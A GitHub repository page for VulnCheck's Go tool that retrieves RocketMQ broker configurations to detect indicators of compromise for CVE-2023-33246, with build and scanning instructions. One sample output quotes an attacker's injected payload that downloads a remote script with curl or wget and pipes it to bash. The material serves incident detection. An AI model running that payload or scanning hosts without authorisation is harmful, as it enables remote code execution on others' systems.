Skip to content
/ fetch-broker-conf Public

A go-exploit for fetching the RocketMQ broker configuration in order to discover indicators of compromise for CVE-2023-33246

vulncheck.com/blog/rocketmq-exploit-payloads

License

Apache-2.0 license
5 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

vulncheck-oss/fetch-broker-conf

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
.github
.github
 
 
.gitignore
.gitignore
 
 
.golangci.yml
.golangci.yml
 
 
Dockerfile
Dockerfile
 
 
LICENSE
LICENSE
 
 
Makefile
Makefile
 
 
README.md
README.md
 
 
go.mod
go.mod
 
 
go.sum
go.sum
 
 
main.go
main.go
 
 

Repository files navigation

Fetch Broker Configuration

Fetch Broker Configuration will try to download the RocketMQ broker configuration in order to hunt for indicators of compromise in the rocketmqHome variable. The variable is used by various attackers to execute code via CVE-2023-33246. For additional details, see the VulnCheck blog.

Compiling

You can use the makefile to build a docker container:

make docker

Or, if you have a Go build environment ready to go, just use make:

albinolobster@mournland:~/fetch-broker-conf$ make
gofmt -d -w main.go
golangci-lint run --fix main.go
GOOS=linux GOARCH=arm64 go build -o build/main_linux-arm64 main.go

Usage

The tool is built on top of go-exploit, so there are multipe ways to provide targets to scan. A full description can be found in the project's scanning documentation. However, the following shows some examples:

Scanning One Host

albinolobster@mournland:~/fetch-broker-conf$ ./build/main_linux-arm64 -a -e -rhost 10.9.49.143 -rport 10911 -log-json true | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-09-05T05:27:48.567836165-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.143",
  "port": 10911
}

Scanning Multiple Hosts

albinolobster@mournland:~/fetch-broker-conf$ ./build/main_linux-arm64 -a -e -rhosts 10.9.49.143,10.9.49.150 -rport 10911 -log-json true | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-09-05T05:34:27.505747211-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.143",
  "port": 10911
}
{
  "time": "2023-09-05T05:34:27.802345043-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.150",
  "port": 10911
}

Scanning a File of Hosts Using a Proxy

go-exploit provides the ability to scan via a provided target csv, where the csv is: host, port, anything if ssl is enabled (although the SSL field is ignored if -a is used). It also provides the ability to scan through a proxy. The command works like so (note that -a is SSL autodetection):

albinolobster@mournland:~/rocketmq-broker-conf$ ./build/main_linux-arm64 -a -e -rhosts-file /tmp/rocketmq.csv -proxy socks5://127.0.0.1:9050 -log-json true 2>/dev/null | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-08-31T13:45:35.781849255-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "-c $@|sh . echo (curl -s x.x.x.x/rm.sh||wget -q -O- x.x.x.x/rm.sh)|bash;",
  "host": "x.x.x.x",
  "port": 10909
}

About

A go-exploit for fetching the RocketMQ broker configuration in order to discover indicators of compromise for CVE-2023-33246

vulncheck.com/blog/rocketmq-exploit-payloads

Topics

cve-2023-33246 go-exploit

Resources

Readme

License

Apache-2.0 license
Activity
Custom properties

Stars

5 stars

Watchers

1 watching

Forks

1 fork
Report repository

Contributors 2

  •  
  •  

Languages